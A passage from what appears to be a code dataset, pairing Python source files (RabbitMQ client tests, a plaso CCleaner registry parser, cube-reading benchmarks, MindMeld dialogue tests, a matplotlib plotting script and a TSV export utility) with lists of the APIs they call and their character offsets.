await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously where only some messages are delivered
to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms
This is a regression for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| [
"asyncio.Queue",
"asyncio.wait",
"uuid.uuid4",
"pytest.raises",
"asyncio.sleep",
"aiormq.spec.Basic.Properties"
] | [((257, 272), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (270, 272), False, 'import asyncio\n'), ((1354, 1369), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1367, 1369), False, 'import asyncio\n'), ((3581, 3596), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (3594, 3596), False, 'import asyncio\n'), ((4831, 4843), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4841, 4843), False, 'import uuid\n'), ((5774, 5786), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5784, 5786), False, 'import uuid\n'), ((6250, 6296), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelClosed'], {}), '(aiormq.exceptions.ChannelClosed)\n', (6263, 6296), False, 'import pytest\n'), ((6418, 6475), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelInvalidStateError'], {}), '(aiormq.exceptions.ChannelInvalidStateError)\n', (6431, 6475), False, 'import pytest\n'), ((5936, 5990), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelLockedResource'], {}), '(aiormq.exceptions.ChannelLockedResource)\n', (5949, 5990), False, 'import pytest\n'), ((6930, 6942), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6940, 6942), False, 'import uuid\n'), ((535, 581), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (563, 581), False, 'import aiormq\n'), ((1629, 1675), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (1657, 1675), False, 'import aiormq\n'), ((5391, 5426), 'asyncio.wait', 'asyncio.wait', (['messages'], {'timeout': '(0.2)'}), '(messages, timeout=0.2)\n', (5403, 5426), False, 'import asyncio\n'), ((5524, 5543), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (5537, 5543), False, 'import asyncio\n'), ((7020, 7055), 'pytest.raises', 'pytest.raises', (['asyncio.TimeoutError'], {}), '(asyncio.TimeoutError)\n', (7033, 7055), False, 'import pytest\n')] |
# -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
if part_of_day == 'PM':
hours += 12
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
| [
"plaso.containers.time_events.DateTimeValuesEvent",
"re.compile",
"plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin",
"dfdatetime.time_elements.TimeElements",
"plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter"
] | [((6270, 6332), 'plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin', 'winreg_parser.WinRegistryParser.RegisterPlugin', (['CCleanerPlugin'], {}), '(CCleanerPlugin)\n', (6316, 6332), False, 'from plaso.parsers import winreg_parser\n'), ((2611, 2731), 're.compile', 're.compile', (['"""([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)"""'], {}), "(\n '([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)'\n )\n", (2621, 2731), False, 'import re\n'), ((6092, 6198), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['registry_key.last_written_time', 'definitions.TIME_DESCRIPTION_WRITTEN'], {}), '(registry_key.last_written_time, definitions\n .TIME_DESCRIPTION_WRITTEN)\n', (6123, 6198), False, 'from plaso.containers import time_events\n'), ((2318, 2412), 'plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter', 'interface.WindowsRegistryKeyPathFilter', (['"""HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner"""'], {}), "(\n 'HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner')\n", (2356, 2412), False, 'from plaso.parsers.winreg_plugins import interface\n'), ((4463, 4541), 'dfdatetime.time_elements.TimeElements', 'dfdatetime_time_elements.TimeElements', ([], {'time_elements_tuple': 'time_elements_tuple'}), '(time_elements_tuple=time_elements_tuple)\n', (4500, 4541), True, 'from dfdatetime import time_elements as dfdatetime_time_elements\n'), ((5709, 5829), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['date_time', 'definitions.TIME_DESCRIPTION_UPDATE'], {'time_zone': 'parser_mediator.timezone'}), '(date_time, definitions.\n TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone)\n', (5740, 5829), False, 'from plaso.containers import time_events\n')] |
import time
import pytest
from test import config
from test.cube_utils import CubeUtils
ITERATIONS_NUM = getattr(config, 'iterations_num', 1)
ROUNDS_NUM = getattr(config, 'rounds_num', 10)
class TestDefaultHighRes:
@pytest.fixture(scope="class", autouse=True)
def cube_default(self):
cube_utils = CubeUtils()
cube_utils.generate_cube("default_high_res", 46, 2160, 4320)
yield cube_utils
# ---------------
# Read spatially
# ---------------
@pytest.mark.benchmark(
group="Cube reading for small area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for large area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
# ---------------
# Read temporally
# ---------------
@pytest.mark.benchmark(
group="Cube reading for subset temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for global temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
| [
"pytest.fixture",
"test.cube_utils.CubeUtils",
"pytest.mark.benchmark"
] | [((225, 268), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""class"""', 'autouse': '(True)'}), "(scope='class', autouse=True)\n", (239, 268), False, 'import pytest\n'), ((496, 646), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for small area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for small area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (517, 646), False, 'import pytest\n'), ((869, 1019), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for large area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for large area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (890, 1019), False, 'import pytest\n'), ((1312, 1459), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for subset temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for subset temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1333, 1459), False, 'import pytest\n'), ((1686, 1833), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for global temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for global temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1707, 1833), False, 'import pytest\n'), ((318, 329), 'test.cube_utils.CubeUtils', 'CubeUtils', ([], {}), '()\n', (327, 329), False, 'from test.cube_utils import CubeUtils\n')] |
import pytest
from mindmeld.components import Conversation
def assert_reply(directives, templates, *, start_index=0, slots=None):
"""Asserts that the provided directives contain the specified reply
Args:
directives (list[dict[str, dict]]): list of directives returned by application
templates (Union[str, Set[str]]): The reply must be a member of this set.
start_index (int, optional): The index of the first client action associated
with this reply.
slots (dict, optional): The slots to fill the templates
"""
slots = slots or {}
if isinstance(templates, str):
templates = [templates]
texts = set(map(lambda x: x.format(**slots), templates))
assert len(directives) >= start_index + 1
assert directives[start_index]['name'] == 'reply'
assert directives[start_index]['payload']['text'] in texts
def assert_target_dialogue_state(convo, target_dialogue_state):
assert convo.params.target_dialogue_state == target_dialogue_state
@pytest.mark.conversation
def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('are there any stores near me?').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates="I'm not sure. You haven't told me where you are!")
@pytest.mark.conversation
def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('Howdy!').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates='Sorry, I did not get you. Which store would you like to know about?')
@pytest.mark.conversation
def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
for i in range(2):
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Which store would you like to know about?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Sorry I cannot help you. Please try again.')
assert_target_dialogue_state(convo, None)
@pytest.mark.conversation
def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('exit').directives
assert_target_dialogue_state(convo, None)
assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.'])
def assert_dialogue_state(dm, dialogue_state):
for rule in dm.rules:
if rule.dialogue_state == dialogue_state:
return True
return False
def test_dialogue_flow_async(async_kwik_e_mart_app):
@async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
async def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
async def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
async def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
def test_dialogue_flow(kwik_e_mart_app):
@kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
| [
"mindmeld.components.Conversation"
] | [((1209, 1300), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1221, 1300), False, 'from mindmeld.components import Conversation\n'), ((1835, 1926), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1847, 1926), False, 'from mindmeld.components import Conversation\n'), ((2455, 2546), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (2467, 2546), False, 'from mindmeld.components import Conversation\n'), ((3273, 3364), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (3285, 3364), False, 'from mindmeld.components import Conversation\n')] |
import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| [
"matplotlib.pylab.xlim",
"matplotlib.pylab.grid",
"matplotlib.pylab.figure",
"matplotlib.use",
"matplotlib.pylab.contour",
"matplotlib.pylab.ylim",
"matplotlib.ticker.LinearLocator",
"matplotlib.pylab.xlabel",
"matplotlib.pylab.colorbar",
"os.remove",
"numpy.meshgrid",
"numpy.loadtxt",
"numpy.arange",
"matplotlib.pylab.ylabel"
] | [((69, 90), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (83, 90), False, 'import matplotlib\n'), ((228, 240), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (238, 240), True, 'import matplotlib.pylab as plt\n'), ((293, 331), 'numpy.loadtxt', 'np.loadtxt', (['"""data0.dat"""'], {'delimiter': '""","""'}), "('data0.dat', delimiter=',')\n", (303, 331), True, 'import numpy as np\n'), ((340, 378), 'numpy.loadtxt', 'np.loadtxt', (['"""data1.dat"""'], {'delimiter': '""","""'}), "('data1.dat', delimiter=',')\n", (350, 378), True, 'import numpy as np\n'), ((387, 425), 'numpy.loadtxt', 'np.loadtxt', (['"""dense.dat"""'], {'delimiter': '""","""'}), "('dense.dat', delimiter=',')\n", (397, 425), True, 'import numpy as np\n'), ((447, 474), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (456, 474), True, 'import numpy as np\n'), ((479, 506), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (488, 506), True, 'import numpy as np\n'), ((516, 533), 'numpy.meshgrid', 'np.meshgrid', (['X', 'Y'], {}), '(X, Y)\n', (527, 533), True, 'import numpy as np\n'), ((795, 894), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[-1, 1]', 'cmap': 'cm.bwr', 'linestyles': '"""dashed"""', 'linewidths': '[2, 2]'}), "(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed',\n linewidths=[2, 2])\n", (806, 894), True, 'import matplotlib.pylab as plt\n'), ((890, 985), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[0]', 'colors': '"""black"""', 'linestyles': '"""dashed"""', 'linewidths': '[2]'}), "(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed',\n linewidths=[2])\n", (901, 985), True, 'import matplotlib.pylab as plt\n'), ((987, 1019), 'matplotlib.pylab.colorbar', 'plt.colorbar', (['cr'], {'format': '"""%+.1e"""'}), "(cr, format='%+.1e')\n", (999, 1019), True, 'import matplotlib.pylab as plt\n'), ((1318, 1339), 'matplotlib.pylab.xlim', 'plt.xlim', (['X[0]', 'X[-1]'], {}), '(X[0], X[-1])\n', (1326, 1339), True, 'import matplotlib.pylab as plt\n'), ((1340, 1361), 'matplotlib.pylab.ylim', 'plt.ylim', (['Y[0]', 'Y[-1]'], {}), '(Y[0], Y[-1])\n', (1348, 1361), True, 'import matplotlib.pylab as plt\n'), ((1362, 1376), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1372, 1376), True, 'import matplotlib.pylab as plt\n'), ((1377, 1391), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (1387, 1391), True, 'import matplotlib.pylab as plt\n'), ((1392, 1413), 'matplotlib.pylab.grid', 'plt.grid', ([], {'ls': '"""dotted"""'}), "(ls='dotted')\n", (1400, 1413), True, 'import matplotlib.pylab as plt\n'), ((1554, 1576), 'os.remove', 'os.remove', (['"""dense.dat"""'], {}), "('dense.dat')\n", (1563, 1576), False, 'import os, sys\n'), ((1577, 1599), 'os.remove', 'os.remove', (['"""data0.dat"""'], {}), "('data0.dat')\n", (1586, 1599), False, 'import os, sys\n'), ((1600, 1622), 'os.remove', 'os.remove', (['"""data1.dat"""'], {}), "('data1.dat')\n", (1609, 1622), False, 'import os, sys\n'), ((1065, 1088), 'matplotlib.ticker.LinearLocator', 'ticker.LinearLocator', (['(6)'], {}), '(6)\n', (1085, 1088), False, 'from matplotlib import ticker\n')] |
# coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API reponse into TSV.
This provides utitlites to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (<NAME>)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
my_handle = open(file_name)
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
